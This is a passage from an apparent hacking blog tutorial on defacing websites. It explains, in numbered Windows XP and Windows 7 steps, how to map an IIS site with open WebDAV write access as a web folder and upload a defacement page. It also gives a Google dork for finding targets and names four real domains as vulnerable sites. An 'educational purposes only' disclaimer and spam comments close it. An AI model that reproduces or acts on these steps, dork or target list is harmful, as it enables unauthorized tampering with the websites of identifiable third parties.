4)A folder named “Web Folders” will open.
5)Right click in the folder and click on “New” and then click on “Web folder”.
6)A dialogue box will open.
7)Enter the url of the vulnerable site and click on next.
8)If no error comes up the sites is vulnerable else try any other siite.
9)After pressing “Next” in step 7 it will ask you to name that web folder, enter any name you want.
10)Open that folder and copy your defaced html page to that folder.
 
For windows 7:
1) Go to My computer >> Right Click >> Select “Add a Network Location” .
2) Click on “Next” >> Choose the first option in the next screen >> Click “Next “.
3) Now enter the URL of the Vulnerable Site and Click on “Next” .
4) Now you will see a folder with name of that site, Open that folder and upload that file.

The link to your defaced page will be like “”http://vulnerablesite.net/mypage.html”” 
where mypage.html is the defaced page i uploaded.


Dork : “Powered By IIS ”
Search this dork in google to search for vulnerable sites.

Some Vulnerable site:-
z6.cn
derakhshan.parniansis.com
ebnesina.parniansis.com
emkhaleghiyeyzd.parniansis.com




Do visit this site :


Leave your feedback and queries in comments. I hope you like all my posts and my blog. Share how to hack with all your friends! we tries to provide the best quality posts explained in the easiest way possible, still if you have any queries please post you queries and feedback in the comments . 

NOTE:-This tutorial is for educational purposes only,Use at your own risk.
How to Hack is not responsible for any type of loss caused due to this information!!

3 comments:

  1. I am definitely enjoying your website. You definitely have some great insight and great stories. coupons codes

    ReplyDelete
  2. Very useful and informative post. I really enjoyed reading this article and will surely visit your website again.

    website developer

    virtual assistant India

    software developer

    freelance software development

    virtual assistant

    ReplyDelete